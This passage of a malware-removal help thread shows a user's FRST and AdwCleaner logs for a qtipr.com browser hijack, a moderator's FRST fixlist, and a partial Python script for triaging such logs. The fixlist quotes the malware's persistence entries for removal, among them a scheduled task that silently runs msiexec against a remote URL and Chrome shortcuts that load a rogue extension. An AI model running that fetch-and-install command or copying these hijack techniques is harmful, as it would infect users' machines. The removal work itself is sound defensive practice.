      FirewallRules: [{860197CF-C3CE-451F-8A5A-BE537DF7CF9D}] => (Allow) C:\Program Files (x86)\Origin Games\FIFA 16 DEMO\fifasetup\fifaconfig.exe
      FirewallRules: [{0C1F444D-F79B-476A-8EF2-21813500ADB0}] => (Allow) C:\Program Files (x86)\Origin Games\FIFA 16 DEMO\fifasetup\fifaconfig.exe
      FirewallRules: [{1A2BF766-B14E-4284-916F-A8C9B9012592}] => (Allow) C:\WINDOWS\system32\rundll32.exe
      FirewallRules: [{D9CAF51A-E15B-4CE5-885F-BBFE207309F3}] => (Allow) C:\WINDOWS\Temp\5A36.tmp
      FirewallRules: [{7A5B90F2-AB02-472C-848F-D890B6FCB981}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

      ==================== Restore Points =========================

      14-02-2017 22:13:04 Punto de control programado

      ==================== Faulty Device Manager Devices =============


      ==================== Event log errors: =========================

      Application errors:
      ==================
      Error: (02/16/2017 09:32:25 AM) (Source: HP Active Health) (EventID: 91) (User: )
      Description: Unhandled Exception. Application will terminate immediately.
      System.NullReferenceException: Object reference not set to an instance of an object.
      at HP.ActiveHealth.Commons.Objects.ElevatedProcessVerifier.IsProcessElevated(Process process)
      at HP.ActiveHealth.Core.Program..ctor(String[] args, Boolean mustCheckSignature, Boolean validateIni, Boolean setupPowerOptimization)
      at HP.ActiveHealth.Core.ActiveHealthMain.Main(String[] args)

      Error: (02/16/2017 03:21:45 AM) (Source: Winlogon) (EventID: 4005) (User: )
      Description: El proceso de inicio de sesión de Windows finalizó inesperadamente.

      Error: (02/16/2017 03:03:06 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa LiveComm.exe, versión 17.5.9600.20911, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 1bac

      Hora de inicio: 01d2880071f346ae

      Hora de finalización: 4294967295

      Ruta de acceso de la aplicación: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe

      Identificador de informe: 6786f36b-f3f4-11e6-8363-142d276a8518

      Nombre completo de paquete con errores: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe

      Identificador de aplicación relativa del paquete con errores: ppleae38af2e007f4358a809ac99a64a67c1

      Error: (02/15/2017 08:43:08 AM) (Source: HP Active Health) (EventID: 91) (User: )
      Description: Unhandled Exception. Application will terminate immediately.
      System.NullReferenceException: Object reference not set to an instance of an object.
      at HP.ActiveHealth.Commons.Objects.ElevatedProcessVerifier.IsProcessElevated(Process process)
      at HP.ActiveHealth.Core.Program..ctor(String[] args, Boolean mustCheckSignature, Boolean validateIni, Boolean setupPowerOptimization)
      at HP.ActiveHealth.Core.ActiveHealthMain.Main(String[] args)

      Error: (02/15/2017 03:16:15 AM) (Source: NvStreamSvc) (EventID: 1) (User: )
      Description: Event-ID 1

      Error: (02/15/2017 03:16:14 AM) (Source: NvStreamSvc) (EventID: 1) (User: )
      Description: Event-ID 1

      Error: (02/15/2017 03:12:54 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa ccsetup526.exe, versión 2.0.0.0, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 13a8

      Hora de inicio: 01d2873925067d4c

      Hora de finalización: 0

      Ruta de acceso de la aplicación: C:\Users\Alberto\Downloads\ccsetup526.exe

      Identificador de informe: a1cf182e-f32c-11e6-8360-142d276a8518

      Nombre completo de paquete con errores:

      Identificador de aplicación relativa del paquete con errores:

      Error: (02/15/2017 03:09:40 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa ccsetup527.exe, versión 5.27.0.5976, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 17e0

      Hora de inicio: 01d2873857ace269

      Hora de finalización: 0

      Ruta de acceso de la aplicación: C:\Users\Alberto\Downloads\ccsetup527.exe

      Identificador de informe: 0c63391d-f32c-11e6-8360-142d276a8518

      Nombre completo de paquete con errores:

      Identificador de aplicación relativa del paquete con errores:

      Error: (02/15/2017 03:09:40 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa ccsetup527.exe, versión 5.27.0.5976, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 1f0c

      Hora de inicio: 01d287388e97429c

      Hora de finalización: 0

      Ruta de acceso de la aplicación: C:\Users\Alberto\Downloads\ccsetup527.exe

      Identificador de informe: 058f6d89-f32c-11e6-8360-142d276a8518

      Nombre completo de paquete con errores:

      Identificador de aplicación relativa del paquete con errores:

      Error: (02/15/2017 03:08:18 AM) (Source: ESENT) (EventID: 104) (User: )
      Description: ccsetup527 (6112) testing: El motor de base de datos detuvo la instancia (0) con el error (-510).



      Secuencia interna de intervalos: [1] 0.000, [2] 0.000, [3] 0.000, [4] 0.000, [5] 0.000, [6] 0.000, [7] 0.000, [8] 0.000, [9] 0.000, [10] 0.000, [11] 0.000, [12] 0.000, [13] 0.000, [14] 0.000, [15] 0.000.


      System errors:
      =============
      Error: (02/16/2017 06:27:51 PM) (Source: EventLog) (EventID: 6008) (User: )
      Description: El cierre anterior del sistema a las 13:21:18 del ‎16/‎02/‎2017 resultó inesperado.

      Error: (02/16/2017 01:21:18 PM) (Source: EventLog) (EventID: 6008) (User: )
      Description: El cierre anterior del sistema a las 10:36:02 del ‎16/‎02/‎2017 resultó inesperado.

      Error: (02/16/2017 09:25:46 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
      Description: El servidor {4EB61BAC-A3B6-4760-9581-655041EF4D69} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 09:21:02 AM) (Source: EventLog) (EventID: 6008) (User: )
      Description: El cierre anterior del sistema a las 3:21:35 del ‎16/‎02/‎2017 resultó inesperado.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/15/2017 11:57:08 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
      Description: El módulo de extensibilidad de WLAN se detuvo inesperadamente.

      Ruta de acceso del módulo: C:\WINDOWS\system32\Rtlihvs.dll

      Error: (02/15/2017 11:57:08 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
      Description: El módulo de extensibilidad de WLAN se detuvo inesperadamente.

      Ruta de acceso del módulo: C:\WINDOWS\system32\Rtlihvs.dll


      CodeIntegrity:
      ===================================
      Date: 2017-02-03 00:44:01.175
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-02-03 00:44:00.807
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-27 02:45:55.362
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-27 02:45:54.971
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 15:25:41.619
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 15:25:41.228
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 02:16:43.403
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 02:16:42.856
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-18 03:30:22.998
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-18 03:30:22.639
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.


      ==================== Memory info ===========================

      Processor: Intel(R) Core(TM) i7-4500U CPU @ 1.80GHz
      Percentage of memory in use: 22%
      Total physical RAM: 16276.27 MB
      Available physical RAM: 12663.5 MB
      Total Virtual: 17300.27 MB
      Available Virtual: 13924.2 MB

      ==================== Drives ================================

      Drive c: (Windows8_OS) (Fixed) (Total:890.62 GB) (Free:140.56 GB) NTFS ==>[system with boot components (obtained from drive)]
      Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:22.7 GB) NTFS

      ==================== MBR & Partition Table ==================

      ========================================================
      Disk: 0 (Size: 931.5 GB) (Disk ID: E4F3DC52)

      Partition: GPT.

      ==================== End of Addition.txt ====================

    6. #6
      User Avatar of Darkor
      Registered
      Oct 2006
      Location
      Spain
      Posts
      9

      Re: Remove qtipr.com

      ADWCLEANER log (which, by the way, always finds the same thing, removes it, and it comes back)
      # AdwCleaner v6.043 - Logfile created 16/02/2017 at 23:22:43
      # Updated on 27/01/2017 by Malwarebytes
      # Database : 2017-02-13.1 [Local]
      # Operating System : Windows 8.1 (X64)
      # Username : Alberto - ALBERTO
      # Running from : C:\Users\Alberto\Desktop\adwcleaner_6.043.exe
      # Mode: Clean
      # Support : https://www.malwarebytes.com/support



      ***** [ Services ] *****



      ***** [ Folders ] *****



      ***** [ Files ] *****



      ***** [ DLL ] *****



      ***** [ WMI ] *****



      ***** [ Shortcuts ] *****

      [-] Shortcut disinfected: C:\Users\Public\Desktop\Google Chrome.lnk
      [-] Shortcut disinfected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
      [-] Shortcut disinfected: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
      [-] Shortcut disinfected: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk


      ***** [ Scheduled Tasks ] *****



      ***** [ Registry ] *****



      ***** [ Web browsers ] *****



      *************************

      :: "Tracing" keys deleted
      :: Winsock settings cleared

      *************************

      C:\AdwCleaner\AdwCleaner[C10].txt - [7118 Bytes] - [09/02/2017 13:35:47]
      C:\AdwCleaner\AdwCleaner[C11].txt - [13913 Bytes] - [09/02/2017 17:34:48]
      C:\AdwCleaner\AdwCleaner[C12].txt - [3326 Bytes] - [09/02/2017 17:57:07]
      C:\AdwCleaner\AdwCleaner[C13].txt - [3076 Bytes] - [09/02/2017 18:06:41]
      C:\AdwCleaner\AdwCleaner[C14].txt - [3510 Bytes] - [09/02/2017 18:59:34]
      C:\AdwCleaner\AdwCleaner[C15].txt - [3372 Bytes] - [09/02/2017 19:08:00]
      C:\AdwCleaner\AdwCleaner[C16].txt - [3843 Bytes] - [10/02/2017 12:54:28]
      C:\AdwCleaner\AdwCleaner[C17].txt - [3768 Bytes] - [14/02/2017 04:17:41]
      C:\AdwCleaner\AdwCleaner[C18].txt - [4053 Bytes] - [15/02/2017 23:56:58]
      C:\AdwCleaner\AdwCleaner[C19].txt - [1840 Bytes] - [16/02/2017 23:22:43]
      C:\AdwCleaner\AdwCleaner[C1].txt - [2757 Bytes] - [04/02/2016 03:17:40]
      C:\AdwCleaner\AdwCleaner[C2].txt - [7873 Bytes] - [28/02/2016 17:33:16]
      C:\AdwCleaner\AdwCleaner[C3].txt - [2444 Bytes] - [05/12/2015 02:57:02]
      C:\AdwCleaner\AdwCleaner[C4].txt - [2972 Bytes] - [04/01/2016 19:04:10]
      C:\AdwCleaner\AdwCleaner[C5].txt - [2327 Bytes] - [12/07/2016 05:07:10]
      C:\AdwCleaner\AdwCleaner[C6].txt - [3766 Bytes] - [24/07/2016 10:24:43]
      C:\AdwCleaner\AdwCleaner[C7].txt - [3600 Bytes] - [05/09/2016 13:30:05]
      C:\AdwCleaner\AdwCleaner[C8].txt - [5652 Bytes] - [25/12/2016 05:56:37]
      C:\AdwCleaner\AdwCleaner[C9].txt - [31108 Bytes] - [09/02/2017 12:56:13]
      C:\AdwCleaner\AdwCleaner[S10].txt - [7093 Bytes] - [09/02/2017 13:35:17]
      C:\AdwCleaner\AdwCleaner[S11].txt - [15543 Bytes] - [09/02/2017 1725]
      C:\AdwCleaner\AdwCleaner[S12].txt - [15731 Bytes] - [09/02/2017 17:11:18]
      C:\AdwCleaner\AdwCleaner[S13].txt - [13551 Bytes] - [09/02/2017 17:29:12]
      C:\AdwCleaner\AdwCleaner[S14].txt - [3637 Bytes] - [09/02/2017 17:56:36]
      C:\AdwCleaner\AdwCleaner[S15].txt - [3216 Bytes] - [09/02/2017 18:05:20]
      C:\AdwCleaner\AdwCleaner[S16].txt - [3870 Bytes] - [09/02/2017 18:55:05]
      C:\AdwCleaner\AdwCleaner[S17].txt - [3512 Bytes] - [09/02/2017 19:07:46]
      C:\AdwCleaner\AdwCleaner[S18].txt - [4235 Bytes] - [10/02/2017 12:52:33]
      C:\AdwCleaner\AdwCleaner[S19].txt - [4247 Bytes] - [14/02/2017 04:17:06]
      C:\AdwCleaner\AdwCleaner[S1].txt - [2552 Bytes] - [04/02/2016 03:15:54]
      C:\AdwCleaner\AdwCleaner[S20].txt - [4615 Bytes] - [15/02/2017 23:56:10]
      C:\AdwCleaner\AdwCleaner[S21].txt - [4763 Bytes] - [16/02/2017 23:22:26]
      C:\AdwCleaner\AdwCleaner[S2].txt - [7687 Bytes] - [28/02/2016 17:30:50]
      C:\AdwCleaner\AdwCleaner[S3].txt - [2483 Bytes] - [05/12/2015 02:55:10]
      C:\AdwCleaner\AdwCleaner[S4].txt - [3005 Bytes] - [04/01/2016 18:58:20]
      C:\AdwCleaner\AdwCleaner[S5].txt - [2385 Bytes] - [12/07/2016 05:06:05]
      C:\AdwCleaner\AdwCleaner[S6].txt - [6377 Bytes] - [24/07/2016 10:21:39]
      C:\AdwCleaner\AdwCleaner[S7].txt - [3544 Bytes] - [05/09/2016 12:59:45]
      C:\AdwCleaner\AdwCleaner[S8].txt - [5509 Bytes] - [25/12/2016 05:49:24]
      C:\AdwCleaner\AdwCleaner[S9].txt - [26962 Bytes] - [09/02/2017 12:53:46]

      ########## EOF - C:\AdwCleaner\AdwCleaner[C19].txt - [4121 Bytes] ##########

    7. #7
      General Moderator
      Avatar of @Daniela
      Registered
      Apr 2011
      Location
      Spain
      Posts
      23,121

      Re: Remove qtipr.com

      Hello

      Follow these steps. VERY important ~ make a backup of the registry:

      • To do so, download >> DelFix to your desktop.
        • Double-click to run it. (If you use Windows Vista/7 or 8, right-click and select "Run as administrator".)
        • Check only the "Create registry backup" box.
      • Click Run.

        The report (DelFix.txt) will open; save it in case it is needed and close the tool.


      Next, go to:

      Start >>> Run >>> type notepad.exe.

      Now copy and paste the following into Notepad: (excluding the word "Code")

      Code:
      Start
      CreateRestorePoint:
      CloseProcesses:
      
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Chromium] => "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      ShellExecuteHooks: No Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Bserpy\Phasother.dll -> No File
      ShellExecuteHooks: No Name - {0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Thugagh\Acgemaguty.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      GroupPolicy: Restriction - Chrome <======= ATTENTION
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\hMrsfBZ.dll => No File
      FF Homepage: Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 -> hxxps://www.malwarebytes.org/restorebrowser/
      FF Extension: (Video DownloadHelper) - C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-10-30]
      FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
      FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1214154.dll [No File]
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-16] <==== ATTENTION
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Warcraft [FVD]) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb [2017-02-14]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR Extension: (Presentaciones de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-09]
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      U3 ucdrv; no ImagePath
      2017-02-09 17:33 - 2017-02-09 17:33 - 00003094 _____ C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300}
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avira
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avg
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\AVAST Software
      2017-02-09 17:03 - 2017-02-09 17:57 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Thugagh
      2017-02-09 17:03 - 2017-02-09 17:10 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zicsythifetain
      2017-02-09 17:03 - 2017-02-09 17:03 - 00006096 _____ C:\WINDOWS\System32\Tasks\Erwushprazase Configuration
      2017-02-09 17:03 - 2017-02-09 17:03 - 00005058 _____ C:\WINDOWS\System32\Tasks\Chevuge
      2017-02-09 17:00 - 2017-02-09 17:00 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zujerle
      2017-02-09 13:30 - 2017-02-09 13:30 - 00000000 ____D C:\Users\Alberto\AppData\Local\UCBrowser
      2017-02-07 15:53 - 2017-02-07 15:53 - 03086008 _____ C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe
      2017-02-15 09:53 - 2016-07-22 19:48 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\uTorrent
      Task: {8FEB47DB-6AF4-43E4-82EC-A450E7786342} - System32\Tasks\Erwushprazase Configuration => C:\Program Files (x86)\Eceent\clacay.exe 
      Task: {D6B27619-ED57-41A6-B563-28F9588E867B} - System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => pcalua.exe -a "C:\Program Files (x86)\ItVffRpktW\uninstall.exe"
      Task: {EF46272C-91A2-4AE7-B9FD-68453CF46DD7} - System32\Tasks\Chevuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S30YJ9AF353546&amp;v=201729 /q
      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
      Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      AlternateDataStreams: C:\Windows:nlsPreferences [386]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Archivos temporales de Internet:G7RosvZLTjKjBQvoMJUig [2252]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] 
      
      CMD: ipconfig /flushdns
      CMD: ipconfig /renew
      CMD: bitsadmin /reset /allusers
      RemoveProxy:
      EmptyTemp:
      Hosts:
      end 
      • Save it under the name fixlist.txt on the desktop <<< This is very important.

      Note: The Frst.exe executable and fixlist.txt must be in the same location (the desktop); otherwise the tool will not work.


      • Run Frst.exe.
      • Press the Fix button and wait for it to finish.
      • The tool will save the report on your desktop (Fixlog.txt).
      • Paste it in your next reply.


      Post the report and tell us how the problem is going.

      Regards
      ✿◕‿◕✿ Impatience is not good company ✿◕‿◕✿

      * Follow us on Twitter and become our friend on Facebook.
      * Keep up with the latest online threats at: InfoSpyware Blog
      * Questions are not answered by private message or e-mail; that is what the forum is for.
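
      The entry types that carry the hijack in the fixlist above (browser shortcuts with `--load-extension` plus a start URL, a look-alike shortcut name, scheduled tasks that run msiexec against a URL or go through pcalua.exe, alternate data streams) can be picked out of an FRST log mechanically. The following Python script is an added example, not part of the original posts or of FRST itself; the sample lines, finding codes and function names are constructed for illustration.

```python
import re
import unicodedata

# Matches live or defanged (hxxp) URLs inside an argument or command string.
URL_RE = re.compile(r"\b(?:hxxps?|https?)://\S+", re.IGNORECASE)
# FRST ADS line body: <host path>:<stream name> [<size in bytes>]
ADS_RE = re.compile(r"(?P<host>[A-Za-z]:\\.*?):(?P<stream>[^\[\]]+?) \[(?P<size>\d+)\]$")
EXEC_EXT = (".sys", ".exe", ".dll")

# Constructed sample lines that follow the FRST line formats seen in this thread.
SAMPLE_LINES = [
    r'ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\User\AppData\Local\exampleextensionfolder" hxxp://example.invalid/',
    r'ShortcutWithArgument: C:\Users\User\Desktop\Tool.lnk -> C:\Tools\tool.exe (Example Corp) -> --profile-directory="Default"',
    # Look-alike name: Cyrillic letters written as \u escapes so the mix is visible.
    'Shortcut: C:\\Users\\User\\Start Menu\\Programs\\Int\u0435rn\u0435t \u0415\u0445\u0440l\u043er\u0435r.lnk -> C:\\Program Files\\Internet Explorer\\iexplore.exe (Microsoft Corporation)',
    r'Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\ExampleTask => "msiexec" /i hxxp://example.invalid/msi/rel.php?u=PLACEHOLDER /q',
    r'Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\ExampleTask2 => pcalua.exe -a "C:\Program Files (x86)\Example\uninstall.exe"',
    r'AlternateDataStreams: C:\WINDOWS\system32\drivers:example-x64.sys [80850]',
    r'2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Example',
]


def scripts_in(name):
    """Return the alphabets (LATIN, CYRILLIC, ...) used by the letters of name."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in name if ch.isalpha()}


def triage_line(line):
    """Return finding codes for one FRST line; an empty list means nothing flagged."""
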